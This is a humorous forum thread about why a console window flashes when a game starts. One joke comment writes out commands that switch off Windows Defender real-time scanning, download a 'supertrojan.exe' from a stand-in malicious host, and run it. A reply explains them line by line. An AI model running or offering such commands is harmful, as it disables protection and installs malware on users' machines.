• Norgur
      link
      fedilink
      123
      edit-2
      3 months ago
      Set-MpPreference -DisableRealtimeMonitoring $true  
      
      curl https://malwarefo.ru/supertrojan.exe
      
      ./supertrojan.exe
      ./game.exe
      exit
      0
      • Dr. Coomer
        link
        English
        03 months ago

        Is there a way to remove it or stop it from happening?

        • @CosmicTurtle
          link
          English
          913 months ago

          Set-MpPreference -DisableRealtimeMonitoring $true

          Disables malware scanning in windows (I assume)

          curl https://malwarefo.ru/supertrojan.exe

          Downloads supertrojan.exe from a Russian website

          ./supertrojan.exe

          Executes the file

          ./game.exe

          Runs the game

          exit

          Closes the command prompt.

          0

          Opens the portal to the underworld, to ensure that the command prompt closes correctly.

    • @Cornelius_Wangenheim
      link
      English
      543 months ago

      Real answer is just that they’re executing a process without setting the window style to hidden. It doesn’t mean anything other than the dev is lazy / inexperienced.

    • @Redfugee
      link
      English
      123 months ago

      Do you really want to know the truth or do you want to play your new game \o/

    • @A_Very_Big_Fan
      link
      English
      43 months ago

      I always thought it was running anti-“anti-piracy” measures before launching the game. I suppose it could be malware too, which seems like what the meme is getting at.